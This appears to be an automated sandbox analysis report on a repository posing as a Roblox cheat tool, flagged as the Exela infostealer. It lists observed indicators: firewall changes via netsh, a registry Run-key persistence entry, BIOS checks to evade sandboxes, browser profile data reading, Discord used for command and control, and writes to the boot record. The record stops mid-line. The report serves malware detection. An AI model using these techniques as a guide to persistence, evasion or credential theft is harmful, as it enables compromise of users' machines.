Analysis
-
max time kernel
790s -
max time network
796s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
18-07-2024 23:42
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/2k6k/Exter-Roblox-Exploit-V0.1
Resource
win11-20240709-en
Errors
General
-
Target
https://github.com/2k6k/Exter-Roblox-Exploit-V0.1
Malware Config
Signatures
-
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 10 IoCs
pid Process 3132 netsh.exe 5584 netsh.exe 4048 netsh.exe 1160 netsh.exe 5044 netsh.exe 3752 netsh.exe 5804 netsh.exe 2436 netsh.exe 1896 netsh.exe 5740 netsh.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion PCRepair.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion PCRepair.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion PCRepair.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 16 IoCs
pid Process 1668 outbyte-pc-repair.exe 4780 Installer.exe 1536 ServiceHelper.Agent.exe 3336 ServiceHelper.Agent.exe 772 PCRepair.exe 4628 PCRepair.exe 32 CustomDllSurrogate.x32.exe 4988 4ddig-dll-fixer.exe 3364 4ddigdllfixer_4ddignet_1.0.3.exe 1168 4ddigdllfixer_4ddignet_1.0.3.tmp 2144 NetFrameCheck.exe 3560 4DDiG DLL Fixer.exe 4348 Monitor.exe 3560 VC_redist.arm64.exe 6016 VC_redist.arm64.exe 2176 VC_redist.arm64.exe -
Loads dropped DLL 64 IoCs
pid Process 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 688 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 2228 Exter.exe 4852 Exter.exe 4852 Exter.exe 4852 Exter.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000100000002ab83-299.dat upx behavioral1/memory/688-303-0x00007FFC63450000-0x00007FFC63A38000-memory.dmp upx behavioral1/files/0x000100000002ab54-305.dat upx behavioral1/files/0x000100000002ab7d-310.dat upx behavioral1/memory/688-331-0x00007FFC66EE0000-0x00007FFC66F04000-memory.dmp upx behavioral1/memory/688-332-0x00007FFC80D10000-0x00007FFC80D1F000-memory.dmp upx behavioral1/files/0x000100000002ab5e-330.dat upx behavioral1/files/0x000100000002ab5d-329.dat upx behavioral1/files/0x000100000002ab5c-328.dat upx behavioral1/files/0x000100000002ab5b-327.dat upx behavioral1/files/0x000100000002ab5a-326.dat upx behavioral1/files/0x000100000002ab59-325.dat upx behavioral1/files/0x000100000002ab58-324.dat upx behavioral1/files/0x000100000002ab57-323.dat upx behavioral1/files/0x000100000002ab56-322.dat upx behavioral1/files/0x000100000002ab55-321.dat upx behavioral1/files/0x000100000002ab53-320.dat upx behavioral1/files/0x000100000002ab52-319.dat upx behavioral1/files/0x000100000002ab51-318.dat upx behavioral1/files/0x000100000002ab86-317.dat upx behavioral1/files/0x000100000002ab85-316.dat upx behavioral1/files/0x000100000002ab84-315.dat upx behavioral1/files/0x000100000002ab81-314.dat upx behavioral1/files/0x000100000002ab7e-313.dat upx behavioral1/files/0x000100000002ab7c-312.dat upx behavioral1/memory/688-336-0x00007FFC73CA0000-0x00007FFC73CAD000-memory.dmp upx behavioral1/memory/688-335-0x00007FFC63430000-0x00007FFC63449000-memory.dmp upx behavioral1/memory/688-338-0x00007FFC63410000-0x00007FFC63429000-memory.dmp upx behavioral1/memory/688-340-0x00007FFC633E0000-0x00007FFC6340D000-memory.dmp upx behavioral1/memory/688-344-0x00007FFC63230000-0x00007FFC633A3000-memory.dmp upx behavioral1/memory/688-343-0x00007FFC633B0000-0x00007FFC633D3000-memory.dmp upx behavioral1/memory/688-349-0x00007FFC63200000-0x00007FFC6322E000-memory.dmp upx behavioral1/memory/688-352-0x00007FFC63140000-0x00007FFC631F8000-memory.dmp upx behavioral1/memory/688-350-0x00007FFC62DC0000-0x00007FFC63135000-memory.dmp upx behavioral1/memory/688-356-0x00007FFC62D80000-0x00007FFC62D92000-memory.dmp upx behavioral1/memory/688-355-0x00007FFC62DA0000-0x00007FFC62DB5000-memory.dmp upx behavioral1/files/0x000100000002ab80-357.dat upx behavioral1/memory/688-363-0x00007FFC62D40000-0x00007FFC62D54000-memory.dmp upx behavioral1/memory/688-362-0x00007FFC62D60000-0x00007FFC62D74000-memory.dmp upx behavioral1/memory/688-361-0x00007FFC66EE0000-0x00007FFC66F04000-memory.dmp upx behavioral1/memory/688-360-0x00007FFC63450000-0x00007FFC63A38000-memory.dmp upx behavioral1/memory/688-366-0x00007FFC62C20000-0x00007FFC62D3C000-memory.dmp upx behavioral1/memory/688-365-0x00007FFC63430000-0x00007FFC63449000-memory.dmp upx behavioral1/files/0x000100000002ab88-367.dat upx behavioral1/memory/688-368-0x00007FFC62BF0000-0x00007FFC62C12000-memory.dmp upx behavioral1/memory/688-369-0x00007FFC62BD0000-0x00007FFC62BE7000-memory.dmp upx behavioral1/memory/688-371-0x00007FFC63230000-0x00007FFC633A3000-memory.dmp upx behavioral1/memory/688-370-0x00007FFC633B0000-0x00007FFC633D3000-memory.dmp upx behavioral1/memory/688-374-0x00007FFC62B60000-0x00007FFC62BAD000-memory.dmp upx behavioral1/memory/688-375-0x00007FFC62DC0000-0x00007FFC63135000-memory.dmp upx behavioral1/memory/688-373-0x00007FFC62BB0000-0x00007FFC62BC9000-memory.dmp upx behavioral1/memory/688-377-0x00007FFC62B40000-0x00007FFC62B51000-memory.dmp upx behavioral1/memory/688-380-0x00007FFC62B20000-0x00007FFC62B3E000-memory.dmp upx behavioral1/memory/688-379-0x00007FFC70DE0000-0x00007FFC70DEA000-memory.dmp upx behavioral1/memory/688-378-0x00007FFC63140000-0x00007FFC631F8000-memory.dmp upx behavioral1/memory/688-372-0x00007FFC63200000-0x00007FFC6322E000-memory.dmp upx behavioral1/memory/688-382-0x00007FFC62DA0000-0x00007FFC62DB5000-memory.dmp upx behavioral1/memory/688-381-0x00007FFC62420000-0x00007FFC62B15000-memory.dmp upx behavioral1/memory/688-384-0x00007FFC64EB0000-0x00007FFC64EE8000-memory.dmp upx behavioral1/memory/688-383-0x00007FFC62D80000-0x00007FFC62D92000-memory.dmp upx behavioral1/memory/688-454-0x00007FFC80D30000-0x00007FFC80D3D000-memory.dmp upx behavioral1/memory/688-470-0x00007FFC62C20000-0x00007FFC62D3C000-memory.dmp upx behavioral1/memory/688-471-0x00007FFC62BF0000-0x00007FFC62C12000-memory.dmp upx behavioral1/memory/688-508-0x00007FFC62BD0000-0x00007FFC62BE7000-memory.dmp upx -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{2d48c97b-0c1e-4160-b3c4-c6dabebde745} = "\"C:\\ProgramData\\Package Cache\\{2d48c97b-0c1e-4160-b3c4-c6dabebde745}\\VC_redist.arm64.exe\" /burn.runonce" VC_redist.arm64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe" reg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 45 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: PCRepair.exe File opened (read-only) \??\H: PCRepair.exe File opened (read-only) \??\Y: PCRepair.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: PCRepair.exe File opened (read-only) \??\O: PCRepair.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\I: PCRepair.exe File opened (read-only) \??\L: PCRepair.exe File opened (read-only) \??\S: PCRepair.exe File opened (read-only) \??\W: PCRepair.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: PCRepair.exe File opened (read-only) \??\M: PCRepair.exe File opened (read-only) \??\Q: PCRepair.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: PCRepair.exe File opened (read-only) \??\X: PCRepair.exe File opened (read-only) \??\Z: PCRepair.exe File opened (read-only) \??\R: PCRepair.exe File opened (read-only) \??\T: PCRepair.exe File opened (read-only) \??\V: PCRepair.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\F: PCRepair.exe File opened (read-only) \??\K: PCRepair.exe File opened (read-only) \??\U: PCRepair.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\J: PCRepair.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs
flow ioc 36 discord.com 38 discord.com 51 discord.com 52 discord.com 356 discord.com 35 discord.com 48 discord.com 50 discord.com 355 discord.com 37 discord.com 34 discord.com 49 discord.com 357 discord.com 9 discord.com -
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com 1 ipapi.co 10 ip-api.com 176 ipapi.co 338 ip-api.com 439 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 PCRepair.exe File opened for modification \??\PHYSICALDRIVE0 PCRepair.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\system32\DriverStore\FileRepository\netvwififlt.inf_amd64_882899f2b1006416\netvwififlt.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\wvmbusvideo.inf_amd64_38452bb97e6ec2c3\wvmbusvideo.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\c_fsphysicalquotamgmt.inf_amd64_fcb20c199d071405\c_fsphysicalquotamgmt.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\mdmeiger.inf_amd64_18cc7408406c8fb9\mdmeiger.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\mdmhaeu.inf_amd64_23fc338a679a2df0\mdmhaeu.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\nvmedisk.inf_amd64_70c1ff7c7b3ad950\nvmedisk.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\wceisvista.inf_amd64_3aa3e69e968123a7\wceisvista.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\c_system.inf_amd64_9b8d1bdcdb2e7608\c_system.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\dc21x4vm.inf_amd64_d54f628acb9dea33\dc21x4vm.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\helloface.inf_amd64_740102fec05a8397\helloface.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\mdmsier.inf_amd64_0d7df59d2945d7ff\mdmsier.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\winusb.inf_amd64_d1861060a4b1a6d4\winusb.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\c_fssystem.inf_amd64_cc60e25e4c476237\c_fssystem.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\c_modem.inf_amd64_0f21dba342ab7880\c_modem.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\ipoib6x.inf_amd64_ef71073a5867971f\ipoib6x.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\mdmzyxel.inf_amd64_c17bc00dd56754e6\mdmzyxel.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\netevbda.inf_amd64_b779cb8e24d23b60\netevbda.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\netrtwlane_13.inf_amd64_992f4f46e65f30d4\netrtwlane_13.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\xinputhid.inf_amd64_6c32bb61e34a79ed\xinputhid.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\intelpmax.inf_amd64_900fa880e0a898a1\intelpmax.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\mdmgl001.inf_amd64_03301bd5cd541036\mdmgl001.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\mdmkortx.inf_amd64_d6a8807ca35f0c10\mdmkortx.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\net8192su64.inf_amd64_66c8bfc7a4b1feed\net8192su64.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\npsvctrig.inf_amd64_5c7dd71239e89167\npsvctrig.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\unknown.inf_amd64_8b25be91611870eb\unknown.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\circlass.inf_amd64_8235ce7c619f415a\circlass.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\sisraid4.inf_amd64_65ab84e9830f6f4b\sisraid4.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\smrvolume.inf_amd64_8d4f925d36160ba6\smrvolume.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\bthpan.inf_amd64_a31306bfdf7135b0\bthpan.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\halextpl080.inf_amd64_886e8913864c794c\halextpl080.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\mdmgatew.inf_amd64_81bf63547b8bc934\mdmgatew.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\mdminfot.inf_amd64_a9caa2dc7c07b57a\mdminfot.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\mdmmts.inf_amd64_5ffb208a9c6bdf94\mdmmts.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\netbrdg.inf_amd64_3debe5e78bab1bca\netbrdg.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\storfwupdate.inf_amd64_989f2caf9d3f297c\storfwupdate.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\urschipidea.inf_amd64_4bd4df2779fd9e16\urschipidea.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\usbaudio2.inf_amd64_0dec4f8ed01fa7ee\usbaudio2.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\bthlcpen.inf_amd64_157f2ba493bc64fa\bthlcpen.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\c_fscontinuousbackup.inf_amd64_80b56f8636e8a7d3\c_fscontinuousbackup.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\intelpmt.inf_amd64_1b73fb070c43fe85\intelpmt.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\wvmic_heartbeat.inf_amd64_300c2fef62ff6d5d\wvmic_heartbeat.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\mdmdcm6.inf_amd64_9e04b558f824ccda\mdmdcm6.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\msports.inf_amd64_2501111c1a47968b\msports.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\whvcrash.inf_amd64_14e2bbdc93c1bcf0\whvcrash.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\wudfusbcciddriver.inf_amd64_a881233285343d16\wudfusbcciddriver.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\wvmic_ext.inf_amd64_62309e307087c8d9\wvmic_ext.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\c_dot4print.inf_amd64_16a4b88e2704f0a5\c_dot4print.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\c_smartcardreader.inf_amd64_f67fbcc0a7a69ec9\c_smartcardreader.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\mdmrock5.inf_amd64_d7e3f61b70de13bc\mdmrock5.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\rtcx21x64.inf_amd64_d2a498d51a4f7bec\rtcx21x64.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\netwmbclass.inf_amd64_1fab0fd8cb4d7dee\netwmbclass.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\c_fsactivitymonitor.inf_amd64_cf385a1ef5dc4acf\c_fsactivitymonitor.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\c_net.inf_amd64_cf2766005585f6cd\c_net.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\hidvhf.inf_amd64_97e6da98a8e58924\hidvhf.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\mdmaiwa5.inf_amd64_377ecc296d72d917\mdmaiwa5.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\mdmtdkj5.inf_amd64_42d5be883a2b16ec\mdmtdkj5.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\netrass.inf_amd64_72f156a5ee3f59e8\netrass.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\c_multifunction.inf_amd64_eee7970b25752090\c_multifunction.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\c_tapedrive.inf_amd64_76e507cd905870de\c_tapedrive.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\mdmcpv.inf_amd64_73b88ef706351113\mdmcpv.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\mdmke.inf_amd64_7b58ae07452f0e50\mdmke.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\mdmnova.inf_amd64_20a757541647917a\mdmnova.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\netefe3e.inf_amd64_7830581a689ef40d\netefe3e.PNF PCRepair.exe File created C:\Windows\system32\DriverStore\FileRepository\buttonconverter.inf_amd64_aa65ff63b69c215a\buttonconverter.PNF PCRepair.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 3448 cmd.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\AgentSupportCLR.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\is-20NKI.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Outbyte\PC Repair\is-QT13P.tmp Installer.exe File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\unins000.dat 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\is-5JO6J.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Languages\is-KUKMH.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File opened for modification C:\Program Files (x86)\Outbyte\PC Repair\Data\hsysfiles.mdict-wal PCRepair.exe File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\is-GPDLB.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Outbyte\PC Repair\Lang\is-10489.tmp Installer.exe File created C:\Program Files (x86)\Outbyte\PC Repair\is-LT8K9.tmp Installer.exe File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\SoftwareLog.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\api-ms-win-crt-convert-l1-1-0.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\is-MVFIP.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Outbyte\PC Repair\Lang\is-LFOON.tmp Installer.exe File created C:\Program Files (x86)\Outbyte\PC Repair\is-UICCG.tmp Installer.exe File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\cloud.b4e63d47.tmp 4DDiG DLL Fixer.exe File created C:\Program Files (x86)\Outbyte\PC Repair\is-KQ8O0.tmp Installer.exe File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\api-ms-win-core-sysinfo-l1-1-0.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\unins000.msg 4ddigdllfixer_4ddignet_1.0.3.tmp File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\api-ms-win-crt-runtime-l1-1-0.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\api-ms-win-crt-conio-l1-1-0.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\api-ms-win-crt-process-l1-1-0.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\is-DBELE.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Json\SystemDllJson\is-4HHME.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\is-IRJJP.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Outbyte\PC Repair\Lang\is-2JVC0.tmp Installer.exe File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\vcruntime140.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\is-TAG7S.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Outbyte\PC Repair\unins000.dat Installer.exe File created C:\Program Files (x86)\Outbyte\PC Repair\is-ON9IH.tmp Installer.exe File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\api-ms-win-core-libraryloader-l1-1-0.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\zlib1.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\api-ms-win-crt-filesystem-l1-1-0.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\is-BUF1C.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\cloud.03b7cf48.tmp 4DDiG DLL Fixer.exe File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\api-ms-win-core-localization-l1-2-0.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Outbyte\PC Repair\Lang\is-55LMR.tmp Installer.exe File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\is-3GAMP.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Microsoft.Windows.Shell.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\is-B2B9L.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\cloud.1ecadfe2.tmp 4DDiG DLL Fixer.exe File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\is-77H7J.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\is-5P2V3.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Outbyte\PC Repair\unins000.src Installer.exe File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\api-ms-win-crt-utility-l1-1-0.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\is-BHLG4.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Outbyte\PC Repair\is-4IUB4.tmp Installer.exe File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\is-78N71.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Outbyte\PC Repair\is-T7GPG.tmp Installer.exe File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\is-NOU38.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\is-S2MRM.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Logo.ico PCRepair.exe File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\cloud.8c7bccd6.tmp 4DDiG DLL Fixer.exe File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\api-ms-win-core-console-l1-1-0.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\api-ms-win-crt-time-l1-1-0.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\TS.MvvmLight.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Monitor\api-ms-win-core-profile-l1-1-0.dll 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\Json\SystemDllJson\is-61T5I.tmp 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Outbyte\PC Repair\is-QDFOG.tmp Installer.exe File created C:\Program Files (x86)\Outbyte\PC Repair\Data\is-FR58O.tmp Installer.exe File created C:\Program Files (x86)\Outbyte\PC Repair\Data\is-MI8TR.tmp Installer.exe File opened for modification C:\Program Files (x86)\Tenorshare\4DDiG DLL Fixer\4DDiG DLL Fixer.exe 4ddigdllfixer_4ddignet_1.0.3.tmp File created C:\Program Files (x86)\Tenorshare\4DDiG DLL 